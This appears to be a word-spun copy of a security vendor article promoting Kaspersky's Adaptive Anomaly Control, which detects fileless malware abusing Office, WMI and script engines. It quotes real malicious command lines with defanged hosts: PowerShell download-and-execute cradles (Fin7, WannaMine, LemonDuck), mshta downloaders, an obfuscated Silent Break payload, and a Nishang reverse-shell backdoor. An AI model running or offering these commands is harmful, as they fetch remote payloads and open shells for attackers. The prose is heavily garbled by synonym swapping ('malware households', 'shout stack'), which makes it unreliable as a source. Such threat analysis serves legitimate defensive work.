Corporate endpoint security engineerings for mid-sized companies struggle to surprise us with anything brand new. They furnish reliable protection against malware and, when combined with relevant policies, regular updates, and employee cyberhygiene, they can shield a business from a majority of cyber-risks. For some, it may seem like you do not need more security than this … But is that really the case?

The answer, in short, is no. In fact, in most medium-sized corporations’ cybersecurity strategies, even with an endpoint solution, there are likely to still be gaps that can and should be closed. In this article, we look at what those gaps are and how to fill them.

Legitimate software can hide hazards

Detecting an exploit or trojan that explicitly runs on a machine is not a problem for an antivirus solution. But when a malicious script is launched through a legitimate application, this can be a challenge. For example, when a phishing email document is opened in Microsoft Office, all actions will be performed by the office application.

Such authorized software is often used on a large number of devices, and it is not feasible to simply ban access to it. Antivirus answers will also recognize these files as “trusted”, so may be unable to quickly “understand” that the part of office software is executing atypical process put forward by the malicious code. Moreover, such activity can sometimes be started by administrators themselves as part of system maintenance. For example, the “trusted” Windows Management Engine on a remote machine can be used for deployment purposes. This further complicates the threat detection process.

What it can lead to: fileless malware, insider menaces, miners and ransomware

Downloaders are one type of malware that uses this legitimate software cover. It does not itself perform any direct malicious acts on the device. Instead, it gets to the machine, for example, through a phishing email, and then independently downloads the real malicious code onto it.

There is a specific type of malware- fileless malware- that is often used as a downloader. It does not store itself on the hard disk, hence tracking it with an ordinary antivirus solution is not easy. Because of that, fileless malware is often used in advanced targeted attacks, such as Platinum APT, whose victims were country and diplomatic organisations. Another instance is the advanced PowerGhost cryptominer, which applied trusted software for cryptocurrency mining. According to Kaspersky statistics, of all the anomalous activity detected in legitimate Windows Management Instrumentation processes( WMI ), two-thirds( 67%) were fileless downloaders of the Emotet banking trojan and the WannMine cryptominer. WMI on remote machines is often used by malware for lateral movement.

! function( e, i, n, s ) var t= “InfogramEmbeds”, d= e.getElementsByTagName( “script” )[ 0 ]; if( window[ t ]&& window[ t ]. initialized) window[ t ]. process && window[ t ]. process (); else if (! e.getElementById( n )) var o= e.createElement( “script” ); o.async= 1, o.id= n, o.src= “https :// e.infogram.com/ js/ dist/ embed-loader-min.js”, d.parentNode.insertBefore( o, d )( record, 0, “infogram-async” );

Malware households running in WMI( download)

Now, some might think that simply tightening policies and scaling down consumer privileges is the way to stop the malware from starting any process on the device. However, this is not an option, because fileless malware does not need administrator privileges to perform its malicious actions.

Another possible peril of approved software exploitation occurs when malicious activity is initiated by someone on the network. If the company is lucky, it is just an employee who decided to mine coins employing the corporate computing power. But in this case, since the actions are performed by a trusted user, administrators or a security answer had not been possible to detect them.

Finally, some forms of malware can use legitimate process to disguise themselves( svchost.exe, for example ), which constructs them more difficult to detect manually by IT security teams.

What offers an opportunity to? You need Little Red Riding Hood 2.0, who detects the wolf through external signs and bellows lumberjacks before being eaten

To eliminate these threats, IT security squads need engineering that allows them to detect any suspicious application activity from a corporate cybersecurity perspective. Spotting anomalies in trusted software helps to identify threats at the very early stages, when the malware is already on the machine but before the antivirus reacts to it. This engineering, developed by Kaspersky, is called Adaptive Anomaly Control.

To make anomaly detection work, several troubles need to be solved. First, how does Adaptive Anomaly Control know which activity is abnormal and which is not? Secondly, if the control apprises an administrator about each deviation, many of the notifications will most likely turn out to be simply false positives for scripts launched as part of a workflow. In that situation, the user will immediately just wanted to disable the control.

To resolve that, the technology should first be “trained” to recognize how applications work and what actions are performed regularly by employees as part of their job responsibilities. This minimizes the number of false positives and keeps administrators from going crazy. And, most importantly, if Adaptive Anomaly Control notifies the IT security manager about suspicious activity to ensure they understand when activity needs to be taken immediately. Thus, the technology will turn from” the boy who maintained crying wolf” into an advanced version of Little Red Riding Hood, who manages to recognize the wolf in the guise of her grandmother earlier today and call the lumberjacks for help before she gets eaten.

How Adaptive Anomaly Control works

Adaptive Anomaly Control works on the basis of rules, statistics and exceptions. Rules cover three groups of programs: office programs, Windows Management Instrumentation, and script engines and frameworks, as well as the abnormal program activity category. The regulations are already developed in the product, so there is no need to write them manually.

List of rules for office applications

To start with, Adaptive Anomaly Control has teaching mode triggered for about two weeks. During this time, it monitors the network and collects statistics on application usage. Technically, Adaptive Anomaly Control largely analyzes process creation activities. For example, the command line code of a new process, file path and epithet of executable, and also the shout stack can be analyzed to determine an anomaly. The technology celebrates regular anomalies, which indicate that processes are started by employees for run purposes. Based on the data received, it then defines exceptions to the rules. If administrators use scripts that could potentially trigger the rules, they can create exceptions before turning on the component, which to further improve the quality of the training process.

The training period avoids false positives, but it also helps to catch important anomalies. If a false positive occurs within a rule, administrators can choose not to block the entire network with the exception, but instead configure it for just giving particular script that triggered the rule. This mitigates the health risks of throwing a world exception that makes the component useless.

The policies can be tuned for different groups of users individually and inherited as part of user profiles. For example, fiscal department employees would never legitimately need to execute JavaScript, but the developing team will. Therefore, for the software growing department, some rules may be incapacitated or provided with numerous exceptions, while for the financial department, they may be turned on. Adaptive Anomaly Control recognizes the user group in which the rule is triggered to block or let executing accordingly.

Adding an exclusion for a consumer or group

After the training period, when Adaptive Anomaly Control enters combat mode, the ingredient notifies the IT security manager about any anomalies outside of the exceptions specified during the training period. It provides information for investigation, such as what processes triggered the operations, on what computer hardware and under what users.

Example of anomalous activity by Microsoft Word and possible actions

For example, a PowerShell script trying to start a Windows Command Processor, HTML Application Host, or Register Server from office software may be considered suspicious. Launching these activities is technically possible but not typical of regular functioning. Let us focus on some real-life examples which Adaptive Anomality Control component detects. Fin7 spear phishing campaigns have included malicious Word documents with DDE execution of PowerShell code, which were detected and blocked( doc MD5: 2C0CFDC5B5653CB3E8B0F8EEEF55FC32 ).

Fin7 record with DDE execution

Command-line code from inside a document 😛 TAGENDpowershell -C; echo “https :// sec [.] gov/ “; IEX (( new-object net.webclient ). downloadstring( ‘https [: ]// trt.doe.louisiana [.] gov/ fonts.txt’ ))

Another example is the LockiBot’s downloader, which was also started from within office software( doc MD5: 2151D178B6C849E4DDB08E5016A38A9A ):

mshta http [: ]//% 20% 20 @j [.] mp/ asdaaskdasdjijasdiodkaos

Adaptive Anomality Control also detects suspicious drop-off attempts by office applications. For example, a Qbot document-dropped warhead was detected: C :\ Arunes \ caemyuta \ Polaser.exe( doc MD5: 3823617AB2599270A5D10B1331D775FE ). Another instance of a detected dropper is this Cymulate Framework document activity:% tmp% \ c0de203103ce5f0a5463e324c1863eb1_CymulateNativeReverseShell. exe( exe MD5: D8DBF 8C20E8EA57796008D0F59104042 ).

Similarly, with Windows Management Instrumentation, Adaptive Anomaly Control may react if HTML Application Host or a PowerShell script is launched from WMI. In addition, according to Kaspersky research, most malicious activity( 62%) is detected in the WMI group. WMI is a common tool among malware developers because of its convenience. It allows for easy starting of PowerShell code and performs a wide range of acts, such as system intelligence collection.

! part( e, i, n, s ) var t= “InfogramEmbeds”, d= e.getElementsByTagName( “script” )[ 0 ]; if( window[ t ]&& window[ t ]. initialized) window[ t ]. process && window[ t ]. process (); else if (! e.getElementById( n )) var o= e.createElement( “script” ); o.async= 1, o.id= n, o.src= “https :// e.infogram.com/ js/ dist/ embed-loader-min.js”, d.parentNode.insertBefore( o, d )( record, 0, “infogram-async” );

The number of unique customers attacked, by detection group( download)

For example, the Silent Break Security framework was detected during lateral motion utilizing WMI, which ran this inline PowerShell code 😛 TAGENDpowershell -NoP -NonI -W Hidden -C “$ pnm= ‘5 7wXU7nxLgCRzFJ1q’ ;$ enk= ‘cX6MKM 670 IO+ B5YCcnL8RWbc27WOIIdNxhq45TAcCdI= ‘; sal a New-Object; iex( a IO.StreamReader (( a IO.Compression.DeflateStream ([ IO.MemoryStream ][ Convert ]:: FromBase6 4String( ‘vTxt …< SKIPPED LONG BASE6 4 STRING >… yULif/ Pj/ ‘ ),[ IO.Compression.CompressionMode ]: 😀 ecompress )),[ Text.Encoding ]:: ASCII )). ReadToEnd() “

Such cryptominers as WannaMine and KingMiner likewise use WMI for spreading across networks. Below, you can see their command-line code that triggered detection 😛 TAGENDpowershell.exe -NoP -NonI -W Hidden “if (( Get-WmiObject Win3 2_OperatingSystem ). osarchitecture.contains( ‘6 4’ )) IEX( New-Object Net.WebClient ). DownloadString( ‘http [: ]// safe.dashabi [.] nl :8 0/ networks.ps1’ ) else IEX( New-Object Net.WebClient ). DownloadString( ‘http [: ]// safe.dashabi [.] nl :8 0/ netstat.ps1’ ) “

mshta.exe vbscript: GetObject( “script: http [: ]// 165233.1 eaba4fdae [.] com/ r1. txt” )( window.close)

In the group of script engines and frameworks, activities such as operating dynamic or obfuscated code may be suspicious. For example, LemonDuck’s fileless downloader was detected during lateral motion 😛 TAGENDIEX( New-Object Net.WebClient ). DownloadString( ‘http [: ]// t.amynx [.] com/ gim.jsp’)

Originally, it was a base6 4-encoded inline PowerShell script. The decoded version is shown here for convenience.

Another example in the group of script engines is Clipbanker’s scheduled duty command line, likewise originally a base6 4-encoded inline PowerShell script 😛 TAGENDiex $( Get-ItemProperty -Path HKCU :\ Software -Name kumi -ErrorAction Stop ). kumi

Nishang is a framework and collecting of scripts and payloads which enables usage of PowerShell code for offensive security, piercing tests and red teaming. An example of a seen fileless PowerShell backdoor 😛 TAGEND$ sm =( New-Object Net.Sockets.TCPClient (` XX.XX.XX.XX `, 9999 )). GetStream ();[ byte []]$ bt= 0..65535 |% 0 ; while (($ i =$ sm.Read ($ bt, 0 ,$ bt.Length )) -ne 0 );$ d=( New-Object Text.ASCIIEncoding ). GetString ($ bt, 0 ,$ i );$ st =([ text.encoding ]:: ASCII ). GetBytes (( iex$ d 2 >& 1 ));$ sm.Write ($ st, 0 ,$ st.Length )

As part of the abnormal program activity category, files with anomalous names or places are tracked: for example, a third-party program which has the epithet of a system file but is not stored in the system folder. Likewise, suspicious files inside system directories are tracked: for example, a ShadowPad backdoor was started inside a system folder: C :\ windows \ debug \ srv.exe( MD5: DLL-hijacking applied, dll MD5: CC2F 7D7CA76A5223E936570A076B39B8 ). Adaptive Anomaly Control detects such activity. Another detected instance is a Swisyn backdoor at: C :\ windows \ system \ explorer.exe( MD: 8E0B4BC934519400B872F9BAD8D2E9C6 ). The botnet Mirai likewise places its parts in a system folder and get detected: C :\ windows \ system \ backs.bat( MD5: 7F70B9755911B0CDCFC1EBC56B310B65 ).

A detailed log of Adaptive Anomaly Control regulations applied to various customer groups

” Process action blocked” notification

The Adaptive Anomaly Control algorithm shows how the decision-making process performed during the training period. If a rule was not triggered at all during training, the technology will consider the actions associated with this rule as suspicious and block them. If a rule is triggered, an administrator receives a report and decides what the technology should do: block the process or allow it and apprise the user. Another alternative is to extend the training to monitor further the route the rule is working. If the user does not take any action, the control will also continue to work in smart training mode. The training mode time limit is then reset.

Adaptive Anomaly Control train algorithm

If this technology is so effective, then what are all the other protection features was required for?

Adaptive Anomaly Control solves the specific task of early threat detecting. It does so automatically and requires no special administration skills or proactive measures. This intends information and communication technologies cannot see the malware itself, simply its delivery to the network, as well as the potentially dangerous actions launched by the insider, or the malicious activity of programs that have a status of” not a virus “. It is always easier to treat the disease at an very early stages, so early detection of threats helps to get rid of them faster, with less workload on the IT and information security departments.

However, it is equally important to use the entire range of protective measures including signature-based malware detection, behavioral analysis, vulnerability detecting and spot management, and exploit prevention. These engineerings help to bock most generic attacks, which be interpreted to mean that advanced protection mechanisms such as Adaptive Anomaly Control are offloaded to see the really complex evasive threats. Adaptive Anomaly Control is applicable for encompas this specific risky area and it is effective in this role, while other endpoint engineerings have to address their respective areas of expertise. This style, the complete cybersecurity answer will be efficient enough to protect the business from cyberthreats.

Read more: securelist.com